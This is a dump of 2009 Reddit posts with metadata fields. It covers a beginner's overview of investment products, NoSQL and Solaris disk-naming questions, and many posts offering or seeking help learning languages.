In a future - another type of derivative product, similar to a forward - you buy the OBLIGATION to buy a product at a fixed date, at a fixed price. You are FORCED to buy oil at $80 a barrel on november 22. Naturally, not everyone wants to take physical delivery of the commodity; most of the time, the futures is settled by cash.
Futures are settled every day; every day, one party pays the other. If you bought a future and the price of the item went down, you pay the other party.
Forex is for currency exchange. You buy or sell a pair of currency - USD/CAN for example. In this example, you BUY USD by SELLING CAN.
**Futures options**
Options we saw above, but applied to futures and not stocks. Stock futures exist too.
Bonds are exactly what we saw in chapter one. Simply said, it's a debt that pays X% per year, the yield. It might not pay anything until expiration (zero-coupon) but usually, it will pay semi-annual coupons.
**Mutual Funds**
A funds that holds many products. For smaller investor, mutual funds allow a diversification. If you have $1,000 for example, you cannot buy a diversified portfolio at a resonable cost. Mutual funds are simply pools where everyone chips money in, to invest in a particular field (china stocks, energy, banks, USA...). In my opinion, mutual funds charge a lot and 90% of mutual funds do worse than the stock market.
You won't trade a SWAP, although it pays to know what it is. A SWAP is another derivative product whereas two parties exchange payment. One will agree to pay a fixed cost, another will agree to pay a variable cost (for example).
Stocks traded on the stock market, similar to Mutual Funds, allowing exposition to a more focused product (Oil ETF, Gold ETF, etc)
Products you will rarely hear of. Forget it.
This is a rough introduction to MOST of the traded products on the investing market. As a beginner, you will only trade stocks. You can lose 100% of your capital on options (on stocks too, but hopefully you will make nice picks ;)). Plus, generally speaking, over a long period, stocks always go up. We will look later at how to choose stocks. | r/investing101 | post | r/Investing101 | 2009-10-21 | Z0FBQUFBQm5LN1VxM19la0doRWxZTGhFQTA0QW51S2dQS1ZwUEowQkxhVlhMVXpZcmtNdzRPUTNZMEtCQXo3M3laTGZxZDJwRjF3MUN5OXhEa3I2Q3RldUhsZmdzOWxUR3c9PQ== | Z0FBQUFBQm5LN1ZoakVuZjNiMVRHbGh0VlFjbVNSUmFqOFNyTXB1UmVQNWZfdDlmdXI0STE5ajZBeVBCYWtmcHU0Qm41cl9OVk4wbkZYakdjRDg5emNXRGpNVHhPcjNIQXB6aWxPcVNzbmVKWVVjSWpDaFdqQUlZM3pwYm9WejRVbVc4dzVtV0JDbFZOWFZmRUYya0daQnhUdm5QN3RXOWUydE10Tlo5YjcwZFNfMjBaSl9Dd2hrPQ== |
Cascading—Chris Curtin, pig/hadoop at twitter; | r/nosql | post | r/nosql | 2009-11-01 | Z0FBQUFBQm5LN1VxenlyOVhCSEppN2VQYnNWV0dfSWxqN1VaTTJuaV8tSG9WZXZCSmYtQ1JnSFpodnpVaWpHbERHcTcxWnM2cTR3OWwtMFhySXllMFNXUG9nbGF4dW5Xbmc9PQ== | Z0FBQUFBQm5LN1ZobjhsNXJIU1pGbE5pcVVFTER6d0RzZWlKRFlPd09GSFIyVXAxZU0wbVBuNnFwX2c0V2J6SXZ5al9vaEJ5Uk5OR29RVUNHOTZGb1RLdWNULVN1S0NwZ1BTYk5WeC1DVHd4OU9PLVZqcl9QTEJmeWVuVDFtMGpRUHNjbkF2QXZGak9NWnY3Ny1oNlR5TmxpQkN1alVLN2RZclB2dnpJYnZ1REptVUNfZ0NTN25NPQ== |
Post your favorite ESL links. | r/tesl | post | r/TESL | 2009-11-04 | Z0FBQUFBQm5LN1Vxbzg5clQwWk5KSmRhWEtSRE5hOUJlei1icEQ4ZFRaVlJZSC1HU0VzUzBLdXl3b2p6Zzd4SlhGeEk3RGlqT0hHQ0FkcmhzY1FlYTc2bFlaQXE2OVdUSWc9PQ== | Z0FBQUFBQm5LN1ZoOEJ6bUtaWnVqUERXZEp6aWp4bFdJaDhkb1FicFctaXJMMDdER2gtUmMzLXFUd09vZDNYQ3NEdjZaaHFNRXRvY3ZzdWs4QWtOMzN1blEzMWc3VVFCTk4waEhSRURraFBUSFhoNEx6VlE0bzN6aW55ak10ZXhhclVGRFdZTTRVVEQyTS1NZnlMX2NmcGhfYS1rTXcxcVFFTVp4ZXhfSmVvYktIUHJob0Jld2pRdmJOZHBTWWJLQnU1VGZmQlNhRG03 |
i've got absolutely NO graphic ability and would really appreciate the help...thanks, guys! | r/logo | post | r/logo | 2009-11-05 | Z0FBQUFBQm5LN1VxTFp3QjNWZWlkam1tZFhDTnFZSXVld0h3TUQ3c0NtNElmbThweGVyQURSUTkyc0Z2UXROdk0zTGpfT3g5a2VjQzcxOVY3cTN4OWM5cjVERlVvV091LVE9PQ== | Z0FBQUFBQm5LN1ZoSWp2Y05Pdi1aaDgxQ3JhSENSekhQQzJHcEVsTlAyR0pFVTBrdm1zeFpoRnBEOG9Udm5idFYzaU1FWXp6bkh5dTByZkRGQWJlWGxNaWVYU19ySkJnblR1UTVpamJNS3d3bFhVUlZUTHBlckw4YWFDWXdrLWFkemNJclBYWUNsdy16XzQxem9DTnBvSGttb09SLTJfbS0xZG9iM1d6Q0I5YzJTaWZVVUFuVFpsb1RsVGg0NElMcFRJQXJ1MUJpU0ha |
Almost every nosql data store out there hails "scalability" as a key feature. That's all good, but there are quite a lot of applications that should work fine on a single server: blogs, wikis, intranet apps, bug trackers, etc. Heck, even CRMs and ERPs for small to medium businesses shouldn't need a cluster.
Can you guys share your thoughts on using nosql databases in such scenarios? | r/nosql | post | r/nosql | 2009-11-05 | Z0FBQUFBQm5LN1VxVkFfVEV6YmNacVFoOG83SjhOUWdwWjdHZkcxUjNERHdkbGlQdDI3STlIV09CbWZ1OEVRQTJoNkxyQXRrVTM2Nmo2bzBGS1h4eFNCQ210bDN0LWcwWHc9PQ== | Z0FBQUFBQm5LN1ZoVnROYkwxX2hpbFlpWEE3clh0S29IdnVhbEhCQVRFRmZvUGswQVNRcVdObUxYWnN5dWZENXJwNEhvZHVWRzVfR00xT21wWFNwR1Vsbnl0TUtmQmhjTU1NYTFfcDY0VDBxdmdxRGZRLVVlLWxTYXNPR2x4QnB0SlJxWDZYTlRZbHNVN2t5UzM3Q1NkVy15VDF5YU1ZblNmb3JEem9JdV9PZ1pHV0ZzTkRTUElFSmJTdmtWN1ZZMU55MnN6bi1oeXlI |
Got my tickets $27 a piece even at the Show Box (at the Market) and the show will be at the Show Box Sodo. General Admin.
A friend of mine has been waiting for this concert for 12 years since they are finally touring their old album Flood. | r/seattleevents | post | r/SeattleEvents | 2009-11-10 | Z0FBQUFBQm5LN1VxN182ZTlwTl9nV0hkbWpGbDdycUpMMEFLcTRJeEV6UzBTNUo2Nnl5SjVhNDVHUTE5SS1aTGc4VE9RTm5SUS1FNXFnVk1EVk1wYkhiMENVVFQ5Q09CRVE9PQ== | Z0FBQUFBQm5LN1ZodzBVakotdnRINy1aMnlEODJyVjlSUzdhc3M1emVFQ2lvZ1pweUtaS2t3NmdtbG9HeUZuVnBwck1ja05YTDBkc0ZxeENZYjhkQ3QyTm0zZmZTYWR0MlZ5QTZYMS1ISllMYXdzcjVPOS1TSV9DSHR2b2pMaFJSRVAxQWZSNXpXRzJrdl9JNHlrMm01V1dDcDhmNUdvM01kNm9UcHBFcE0wSHdpOE01UHh4TE1zRzd2cmQzSWtIUXp6eC1hdmRINi15N1J6SG04NzlBU2JuLWNCWjU3dTVOZz09 |
Here's a repost of my question:
I have Solaris 10 [10/09] installed on a Dell R710 with two Dell SAS 5E HBAs that are attached to two SuperMicro SC846 JBOB chassis that have the SAS-846EL2 backplane. This is going to be a ZFS based NAS box.
After testing several configurations and swapping drives around in the backplane, my drives are showing up like this:
0. c0t0d0 <DEFAULT cyl 8921 alt 2 hd 255 sec 63>
1. c0t1d0 <DEFAULT cyl 8921 alt 2 hd 255 sec 63>
2. c1t26d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
3. c1t27d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
4. c1t28d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
5. c1t29d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
6. c1t30d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
7. c1t31d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
8. c1t32d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
9. c1t33d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
10. c1t34d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
11. c1t35d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
12. c1t36d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
13. c1t49d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
14. c2t50d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
15. c2t51d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
16. c2t52d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
17. c2t53d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
18. c2t54d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
19. c2t55d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
20. c2t56d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
21. c2t57d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
22. c2t58d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
23. c2t59d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
24. c2t60d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
25. c2t61d0 <ATA-WDC WD2002FYPS-0-5G04-1.82TB>
I'd like the drive numbers in the system to match the hardware slot they're in. [E.G. have controller 1 start with c1t1d0, and controller 2 start with c2t1d0. Since this system isn't in production yet, is there a way for the system to reset everything in /dev?
If I'm being too anal about this, just say so. All opinions are appreciated.
**Edit:** What I'd like to do is have the system completely forget the drives on c1 and c2 in /dev and start like I'd just installed the OS. | r/solaris | post | r/solaris | 2009-11-10 | Z0FBQUFBQm5LN1VxV1NNSnNnRjlPTnU2T21FLW1jZy1zR1J6YWV2WjhNN2QzVkd5TXdpUGtrVDNwSVRabmtkYUdrdEc0WVNONlNBQ0lMMWFjX0w1RnpOTUNieGlFQ25aS0E9PQ== | Z0FBQUFBQm5LN1ZoNDNKVE9Rd2FmaURlaldNbG9DaGdSXzZvMUpTWmpDZGJHYTJsVTkyVEcwTzJFN2NNLU5JSWFTR1dkUDRGeWo4RVNBZHRoM3NSYUlicGVNLUZBSklsaFFveFlYVVNsTnlaaUtrMFo3ZWJtUlZON2RGUHExTEF5OGJraW83eTdGY2ZmbDlaaE8zamZQUXZrcXgzQ0JUSGtjY1BHRjE4X0oxTW92Q1c1M0pzdGwzOG5SaVFkRFpQUmZodjFRV0g2eE4wYmxlRDJlNTlzOTNrY19yOFJlN2ZWUT09 |
Hello there. I speak Russian and some Japanese if anyone wants to learn beginner grammar or anything for any of those languages. I figured I have a bunch of study guides, programs, etc. that might be beneficial. If anybody wants me to create a "Basics of Russian/Japanese" thread, I could just post a little each day or something. Good luck! | r/learnanewlanguage | post | r/LearnANewLanguage | 2009-11-23 | Z0FBQUFBQm5LN1VxNGFnWXltbHBXU280R1NwcnB4YzhBd2UyYzc0MmxfRld0XzFGYXJEcXhpeW9zUng1YWgyY3IyWmg2OU9zRzZnVTNkR241b1BBdHV4dTkyUHZIeTA2ckE9PQ== | Z0FBQUFBQm5LN1ZoTjBQNFRNMmxEcG9pcFNyRUw1WGctdTY3blQxYlhfamd6WkdXLWh3VGV1azJaM0ZHczQ5X016LU5RT3JXdzNNSkpmQm5wS2RyZUlPNlRhVUdjQWJ1d0hicnhMR2NmYTJIV0dxc0czeFJDWmtTSS0zdFpZcl9XWVBEVFdZZDB4SEdRcFVGMDlRekZhSlhldEZYMVcxX0dmYkVjVTJWN0M3X2tfWnRnaVZJaFY2VFBSRGtRRE9BZkFLYzY2SFNKQnN2OGFiU2xnQnlvQmxmM2QxVUZEalhOdz09 |
I would be happy to help any beginners in Arabic. I am not a native speaker but have been studying it for the last 2 years. | r/learnanewlanguage | post | r/LearnANewLanguage | 2009-11-23 | Z0FBQUFBQm5LN1VxcDZmSXM2UE9jcVFIaklqM0ktcm9LbUJ4V24yckMyUXdyektBcWhHNnVoM2NWSXlVbk1kZnduVnU2RUxhUm9xb0RhbkVGSzJpYWdQVVpVUW11LVFpaXc9PQ== | Z0FBQUFBQm5LN1ZoM0tYakQ4OFR5OHF0OG00REgxNjhPd0hfdVc0ZzdqZDEtSS1CVEJaQUtRdHl2Wlc3N1NwMmprNnhwcU9wTkU0eGx3d1NFdF9yNF8xTHBuTmpRTVJtdU1hSjc2RXlWRms1bDllV0NYYjBpeExRMG54a2wxUjRaNEVJNXpzWExTZ2t3OFZ4RTVybVV4SnBYV2J2U3BEamNDRGs4XzJBWlNvNlpCY3FVZUlLUmp3PQ== |
one could make a "Basic Japanese" thread, comment "What color is an apple?", and another tutor could comment below that to create a different thread "Where do we shower?"
As there is already "LearnAnotherLanguage" and countless other specific resources on learning every language spoken by man. | r/learnanewlanguage | post | r/LearnANewLanguage | 2009-11-23 | Z0FBQUFBQm5LN1VxSXBQZ3FybzdGZU1IZnozUmNzeHRHbWhOV1MtTEl1cmlXSmpiSEJKRS1FRnlST1JnM3RVaEZ6eFFidF92OFBCX3owTVpzOHcwSTdTR1BLUWVVQjZoOUE9PQ== | Z0FBQUFBQm5LN1ZoLW9SQmNUWTV1bHJwb3JQbjVsOTJDdXdobUlZU0o2SHBWS1dTNlRRWnpoNDc1SnVoMGVTckdmcDVoZ0ktUHRaMEtXWVRORWpVc1pIcGNONEpKNW5rUUVFS3hxVFhWbmpZajVSZ09LeFJzel8td21XRlpkNnY2aGxKQ2djUHhqOW45YkZJMXViM3NTMW1JX1FaLUFXQTZIT1E3cU1YckV0V2tBczRLTWh4Y0d2TnlvNHlvSmxwNjZaNjZadWI2UzQ5ODRjTDdfbTlvLXVHQUswd0FOQkFodz09 |
I'm not fluent by any means, but I have some understanding of the language. | r/learnanewlanguage | post | r/LearnANewLanguage | 2009-11-23 | Z0FBQUFBQm5LN1VxSlAwaWRUT2JvdnBIQzdHeUJPRWo2VnY1THl6cGhNRXNqVjNsVWtIR29GcUZfa2JhUVctZWhncHBmZm5vM3UzdmFKYUFvWjA5SDUtdDRuVElaeUZ6MkE9PQ== | Z0FBQUFBQm5LN1ZocHdYLXVJbGU2TkRyRkdxc2MzVERfdkdMVWloSzhCcHY5RGQtZkExNG40bE9UYXB3dXdBNjZjVFVITnR3Y3ctR0dJS1lBaVEzUnNDU2dEY1NwbUlOZl85ODN3ck5QOW5zWm1nRlBlVERWc3ZQUWFfX2stNDY1R1NoSlpxTk5KWDZNYkcyZFpjbkxPdDNqYjhCN0NGcmMtczI0R0NTTklVeXkzRnhqMEUta2tib3EwdHppLWVFSERiYWRaOTlGcUZaOEJ1OXZ3YjZjWlRvbDhrSnRFbmdnQT09 |
I'm in 200-level German at college, but it's been a couple of years since I took my last German class and I've forgotten a lot of my grammar and vocabulary. Unfortunately, the textbook for my course is one of the worst texts I've ever had and it isn't helpful at all. I need a supplementary textbook with clear explanations and charts and with lots of helpful exercises. Thanks. | r/learnanewlanguage | post | r/LearnANewLanguage | 2009-11-23 | Z0FBQUFBQm5LN1VxMjI1QkVqc2NtWGF2N2FxMVJxWXctRjRfVG1IeUJwX2hzMVBGMkprNWhkVzdjVWZyVFI5Y2xiWkIyemZEbVJvd295Mk5wbU8xTzRTNzFpQTdVRWZQUVE9PQ== | Z0FBQUFBQm5LN1ZocHZhUXNNNk9HWjlFQXBERi1TZVFPMWZ2WkdEY1Z0bm1EZ0MzRmxFRXkzTEdDbHY1QWFWMXo2QzBrMjBPaXMtZWdfVmV6VlJxdjhzc3B6UldkWUhIa2p1bFdjV1hjWXB6LU5Nb2NWRnJFcTJIQnprLUlkRlM4ek5uWnlBTDFVMVhPZ2hrV251YVg0bU9UVm9YZnBMMzVTajNfdGRQMEJJemc5MldVbHdha3dkX0NVNG12T3lIZ0FCei1SaDI4MThvemZPS2J2RVRUUlRMcGtKeVZ1ZHBlZz09 |
I can fluently read and write in the Sindarin form of Tengwar. The spoken Elvish language is incomplete and I only know how to say one thing, "Aramth tirion tul giliath"... which I believe to mean, "All your base are belong to us."
However, the elvish alphabet is complete and I'll happily teach you how to master it.
The following link is a picture that says "Learn Tengwar with Deeps"
Edit: I'm going to work on it a bit, and in the next few days I'm gonna post a link to Lesson 1 of Basic Tengwar | r/learnanewlanguage | post | r/LearnANewLanguage | 2009-11-23 | Z0FBQUFBQm5LN1VxaDBxOFFSbnhCaUFZVHkydlVtbHdxMzRsZVgyNGJQaktKVUNzeWF5b0M1UjljNWRVOXFHNTlnUGkwNWRmQkZYNzE2YmNEbE9mT3JmRnZxdWRKWXV5UlE9PQ== | Z0FBQUFBQm5LN1ZoSjVkQlM0Rzh5cUhZSjZXa3VobS1KS05WazRkVHYyNGs3MWZadHluRlVjU0oxX0FLOGdZWEJXMXJqTEZ3SE9YRzZfUkc4ZUFzUDJDSC0xd05MQVBDVGhUYVRLbTJtTldtYUVmT2lqNXJ2aWRzNms3NDZhTjFfa3RUd1lxVndDWnJwR1k3eThLc0RfV2M0blBHcnI2WEQwUHp5ajE4ajVFX29ia2ZaN203Z0RRcjEyallaRTQzSmRBUzF4dGJHd0g0ZjFwVkJTYjVIQmRVYUthV3NEOF9zQT09 |
I've been raising money for a while to build an Orphanage in Malawi (in Monkey Bay) and its taken me a while, but i've saved up enough money to fly over in June/July 2010. I don't have enough spare time, with work, uni and volunteering to fit in regular lessons, but it would be amazing if there was a redditor who was fluent at Chichewa so I could maybe practise sending emails to about stuff (and get the occasional translation ect).
| r/learnanewlanguage | post | r/LearnANewLanguage | 2009-11-23 | Z0FBQUFBQm5LN1VxSEQtWkMwYjBNYVBiTXhFX3YwNVlJeDNPVGtyUG1ZNG9xNmVIdUNia2dSbmNfVF9Gd0RLLXl4d0Jvd0FsbTNuZl9ySzhLM3pXWFlUTjd6Z2VCeElBRVE9PQ== | Z0FBQUFBQm5LN1Zod0ZNaDQ2SFB4T1RTVDFrMmRYWlU0R2dIZl9aTUdQTGlLbWQ4X2FzZnJsRjlEZWJtMVU3MkdwU3UzaC1BcjV4ZUF4YjNUUk1oMkE2amNNUWJ4UTF4QTc3QkxNQk5GNVdUZW5rTi05VDR4RzRZWnN1SEJwN1FDMkJ0cHJYT0JHSW1iVklaZ1V2a1lXVlA2dFczOWtGSUN0ZmFWSVVoWUQ5Vkc1NnZxdmlLcEJ5eW53RzR6dDVCX1FDYi03UnRQRVBmdnFGWmpvOG5jak5ITmczYzZNSTVCUT09 |
Here's the deal, I think that with Pimsleur I can learn a lot. The problem is, I always start up and then lose interest and suddenly run out of time to do it.
I want a group of fresh beginners, like me, in the language so that we can push each other towards the goal of finishing the Pimsleur course and further study of the language. Throughout the learning process, we can also do video conference chats on Tinychat or something so we can practice together, hell, if we could get a native speaker as a guide that would be great.
Is anybody with me on this one? I would really like to do Norwegian but I'm flexible on the language, however, I would like to keep it Scandinavian/Central European or Russian(I heard this one is fucking hard).
EDIT: Looking for people that can truly devote time to this, ~1 hour a day. Once we get at least 7 people, well draw up a calendar of assignments and Tinychat conferences and we can get this ball rolling along. | r/learnanewlanguage | post | r/LearnANewLanguage | 2009-11-23 | Z0FBQUFBQm5LN1VxalZHVlc5dG0zQ0ZYVFFPX2NoNlU0YXBOTm5Rb1dsNzYzbFFaU25TS3JPWlJDRVZSUVNJLWJ4QXVCbTg4dnNaWWF5N2pwamE0VW85QXpVUkVzTXd2Wnc9PQ== | Z0FBQUFBQm5LN1ZoVjh0bGR2bWF3bnhvTkxLN0QtLXB6c1NvQVp5VGhDWWZpa0Y3X2RTSWcyRlVDd0NDS1FPR1NfaFJEQ0hPUWY0NVh2bERjX3ZPMzAzMUVhWFo2Sk5zQW9ZYmFqU1l6NEFUZnFFQklnZ0U1cHJZaVVFbTNqd1ZiYTBiOXNPOHJKNHhNOGNqZ0RyUWRSVklBa1RCVFNIdDk1ZUNhMGdSTUk2VE90SUYzWmloR0JqUTZNVVpTNFU3WnZZSTVKNXpqd2dKTUpJTVdKcUVla1Y1ZXE3NERLU0J1UT09 |
I'm interested in learning Korean. I already have some background in Chinese and Japanese and I'm now interested in moving onto Korean. Anything will help! I know that you use Hangul to write and it's derived from Chinese, but besides the memorization of the writing system, basic knowledge of the Korean computer keyboard, and my Korean name, I know next to nothing about Korean grammar (though I heard it's similar to Japanese grammar) and vocabulary. Thanks! | r/learnanewlanguage | post | r/LearnANewLanguage | 2009-11-23 | Z0FBQUFBQm5LN1VxUmdvWWdaTEI4cEhlbG1lek8wdlVNZjZaZEJ1Z0tYSm14LWZPUWZLbjlVUWpOVW1OelZmOFlaV0xneTJKMDlwR1Z6anFZQzlzY3p0LVhTYkRyc3JPdlE9PQ== | Z0FBQUFBQm5LN1ZoRk9CaFZOLXZDdVZkMWFSMWFqeURTMGgtMHM5bFNOeDdueVBWb0dDajllNExYRnBPU24wWUZ1cVRKWlU0bHYyazR3eW9aY0xadnk1Q0hTbTdLNFQ1T2hrM2FQUHdreHVVVkNuZ0JTbWR4bGMzRFFjb0VvcnlVOUNXMmVtZ2JNb1NWOEdoRDRQWVdFdm1lZW5hUmN1V3VzOEEtMzM3NC1rZVk5YVZEU1JoNUtIOTNLQVJXbWVVVWxfR3ZwTXVKQmRB |
I have always been interested in the idea of a constructed language, but it's just one of those things I never got around to learning. [This](http://en.lernu.net/) website looks pretty helpful. | r/learnanewlanguage | post | r/LearnANewLanguage | 2009-11-23 | Z0FBQUFBQm5LN1VxaS1NVFl3alRZblFpWDZpRjZrNkV3N0dVZ0c2bTdmNjBaMlpWUHpjOEp5d2RhTjR4UGU1OXFnTXpVekNyaDBrNlpVc3d2RzA0d0xwVUNWZ1JmbGZhenc9PQ== | Z0FBQUFBQm5LN1ZoMFhoVFNucUdoS1RzdkFSRVlzSUZSY1g5QWRvSWs0aHJ3SEhEUWlSX0R3dDFoNFBILUM5RHM2bm1Wc3ROUmJYbVlxdUpaY051N0xsVnNsSm1WcmFOMVVhVVVSblByNmJlWDlmeGZXR3VrbGJZU2FOR3JmSFdqTkFKSjVMTVktSWxCSmZKeGJXeEQzZ29IWXhZcExMd3E0SHBGdFhFSzJDS2tfT1F3em1VVDctR2t6aXozVTBra3hKd0NUdFdCdW1v |
My mom's side of the family is entirely polish and we have a lot of polish traditions in the family because of such. Other then that there isn't much of a connection, i don't think that anyone in the family knows any of it anyways. But i thought it'd be cool if i learned. It is 'polish' right? they don't speak like german or something(i know it's not but just throwing it out there). would it be hard to learn? | r/learnanewlanguage | post | r/LearnANewLanguage | 2009-11-23 | Z0FBQUFBQm5LN1VxTkVpQnJ5MGhrTVVOQjgya0FYSlNITGpjSFQ0b0E5MXo3RzFKZHViN3VZQ0hJX2VtVUtHa2pBU1VaR2tjUFhYVE9vWVV0cUR2MEJ2SFh5Q1lFczl3S3c9PQ== | Z0FBQUFBQm5LN1Zock1WUzJGeTA0cjVJSjRqWVVWV3g3VVFIUjJrUzJRQzJZajFoVEF1V3U5OHhtREhvMkpPZ0FBdTBPRkt3Z3dyZHI5VHlXQkxTVVFCdFRSRTNxUF9QNkNBeVMwN1dNS1U4TXFuNDNVNmVHakVDaXlSbEhVZ1NTSVNyT3FLaXRXYkxuaWsxaWhiSG5aV0pRWlA0WHlCSXpOYm1ORC1tNnZCWDRXUW1yazR4Z0FUU2hwU1llaE5RU2tvYnRTQ3FkUDJo |
Hey everyone,
I'm a native speaker of Spanish and was wondering if anyone knew of a good resource to make use of both my languages to help me learn another Romance language, especially Portuguese. Most resources are quite boringly slow, and I don't really trust myself to learn effectively without a structured plan (if I just read and watch TV nothing I learn will really stick, and since I already kind of understand it it's easy to get lazy). | r/learnanewlanguage | post | r/LearnANewLanguage | 2009-11-23 | Z0FBQUFBQm5LN1VxTGptZXdwS1JlSnhGQTQ1UDRyMnplMXd0eDBRbDdHZDJFWmV5Q2xBZTQybTFsd2FsR1R6c1ZxYTFNYjYyM0Q5TXZGc2IyemxJalRoMTRYRFRZbzF1U0E9PQ== | Z0FBQUFBQm5LN1Zoblh0ODRHbmM2REFQbnN3aVE2d1pQOFkwYkJfYklDZVZCaGt5Qllhd1dIQXQ5T0kyVUhrMnljWjZPX2xQTk1xWGN0MXg2V2U1dThBaVR4dnJQNFh2cWlpcDAzaE1VaWFQd2J1YndfSU95LUMwVHVyTE5WVGFRMVVDb2J6djFGb3h6bThhaENOR2lycTNzTWpUZno1U3RpaUUxdzJkRDdGU3pvR3JaT18zUXZnY1I3b2tnSjNUam12azBnSjUyUkpVR2dpeTM4S3FpMGd1WEZHQjhuMGREQT09 |
Moses McCormick (learned about 28 languages in the last 8 years)
Alexander Arguelles
I especially recommend Arguelles's video on his shadowing technique:
http://www.youtube.com/watch?v=130bOvRpt24 | r/learnanewlanguage | post | r/LearnANewLanguage | 2009-11-23 | Z0FBQUFBQm5LN1VxREhxTXlhWHN0dWtoT0FZbXc0cW1JM3JKQjVCR20ydzBXS3RRWEs5WXlkMWFjLUEtYVpLNHRGWG94bDl5Unl1M1hjUjkwTUZERHljMWJSMF9Nc1lqQ2c9PQ== | Z0FBQUFBQm5LN1ZoWkFwa2lpNGpjbWlxRjF4TFQ4cEU0OGYxYkh1UEFPSDJiRkxrSTVHd1lBSS05cE9DMTcwbHFRZ1VjcGNlUW1xM3o1TXRYZkI3WHBlMk1HTEdxeGIxWWRydVdDQzItRWExY3lWZG9xdWsxdXIyb3dzVWdaNUJVclIzcTk3Z0ZGZk53Q2tYLUNjREt5UlcxcmNOX2U5di1jdmtDOWxvNWVtOWtoMXBQbFh5NXEwTHdCWlRTQlMxUWQ5Mm1KSXhkTzh4a2JZOXJaYnFmUUhoVzdobEU0MkQwUT09 |
Rosetta Stone has one for Tagalog but not for Cebuano. Online resources are few and far between, and there aren't a whole lot of Cebuanos here in Tokyo... | r/learnanewlanguage | post | r/LearnANewLanguage | 2009-11-23 | Z0FBQUFBQm5LN1VxNW1sMlFUb19pTjdnZUwwRGhoYS05VlgyTm1TMTJXdmxmREpmcVduOUlnRkphZkJ4MHRfeHVLdWp4RlNIMXJZZTUtdTc4b0dSSFg2bjlmcFd4TnBhY2c9PQ== | Z0FBQUFBQm5LN1ZodUxlRmlzUWV4bzV6Qk5YWkQ1V0tRMWFDc09vRzRPcm1VTHNmTGgwTkZnZ1Jqb2lKM01ZSmlFYVI2RnN1dHdUMDJqa0tPekdEZ1dybXh2ekc3VGI3SlEyRTcySm1fWGc3R3NBQ29ncHpGNDNyR3lNcGdRUUlTVno2cWd6dk5jNWtZWEZvOGNDWDFFZnh1cnNVVmVrTmhzeTRrQ1RSSEp2aHNZOGVlVWQyckZFPQ== |
Anyone here trying to learn many languages in parallel? I started off with learning Japanese about one year ago and found that I like learning about languages in general. So after one year Japanese I am now learning Chinese this year to get a better grasp for their characters which are also used in Japanese. The fun starts when you realize that there's a lot more Japanese people learning Chinese than in non-asian countries, and hence they have good quality learning material. My favorite method for learning Chinese right now is Gakken Chuugokugo Sanmai for nintendo DS and it's really fun to use and improve my Japanese knowledge for learning Chinese... I do a similar thing with French with the Assmil books which I also have in French language so I can learn French while i am learning Japanese or Chinese.... | r/learnanewlanguage | post | r/LearnANewLanguage | 2009-11-23 | Z0FBQUFBQm5LN1VxR1lCQURoTU1SM20zd2V0WXN3MGlnUnZCcTNxX0FlSk1RUU10d05JX0dzcDdJSkVVbnN4ZkhqaENpd3VIY2JwS1lDS1B0Y000NDQ1S3JDcGNubEdBWGc9PQ== | Z0FBQUFBQm5LN1Zob0FkdzRwWTBvUWdlTmhXeG9HVVhVR3JLV0RFeGVRYTRsVlhmT2l1QVFyY2VjdVRKcTR4VGlxcTJHbWE2RmpJbUxZVHI2dndId08tbnpDYlVpMFZtUkNIRmp6LTlTbnBCTV81ekxJXzFZRm9LbU5fOTh4TjlLdEYxZU9sVHViQ3ZsWUoxMzliNWZENHQ5bE51Ykx2NnZhc0ZVcC1GSkdzcER5N0ZFaWNBRFd2WV9KSFNyTk5xek5RMHAyREg3YXhOcUNlQmtYRlZFcWR5SUJsY0RUVWZPdz09 |
If you speak French, Spanish, Italian or Portuguese, then you know how easy it can be to pick words out of the other romance languages.
Well, the other day I was watching [a Seinfeld clip on Youtube](http://www.youtube.com/watch?v=wJ7GOXH9Avo), which someone had subtitled in another language. I always get distracted by subtitles so I kept looking at it, and I realized that I could figure some of it out even with the English audio off.
I looked to the sidebar to find that the subtitles were in Romanian of all things. I was really surprised because I had always assumed Romanian would look/sound very Russian - but it is in fact the 5th romance language. (Duh, I should have known - ROMANian)
Check out this YouTube video that teaches you a few basic words to see what I mean! Looks like a pretty easy language to pick up if you have knowledge of the other romance languages.
http://www.youtube.com/watch?v=VZK9sCeagNc | r/learnanewlanguage | post | r/LearnANewLanguage | 2009-11-23 | Z0FBQUFBQm5LN1VxNDUxQnRvMm1GZEh1LUhESWZyZWpkRWpuNDBjak84eTR3enFtQjRWNEVlUDV1SGdFcFVYaHdiWEo0Zi1OWHFNa2hQaTlFY29PU3Zuc2UxalVQTnYyXzU5dFZpMmRsOWFGXzFVWi1Ra2swUjg9 | Z0FBQUFBQm5LN1ZoQi1BYXlIZGhQdHQ1eEVPcjlsUlptNmJ1V1RaanU5R1FQVG9XTXhPeXJ5TGM0UDlvYWNDU3VraFB6MGUyTmMwNlV3RVF2UWp4U2RPRXRzUFRFa2lLaXRZcmpvSS1OUWxRdmxScWNoZjJfZHhLRXFweUxDaDB5cnE5bkNNY1ZobHNEdVNzM0F2amVHdDRteV9va3dURUM1T0luUWZXVmd0MFN0TmVVVDBZNVlRajd1ekhaSVJvbE8zRW9VdnQ3LUtES1J2b24yV2ktU0c2blNDdldTeWpnUT09 |
I can't promise to post regular lessons, but I can answer questions, chitchat, review your writing, things like that. I can also discuss formal syntax and grammar.
I can't engage in voice/video chat at the moment. :(
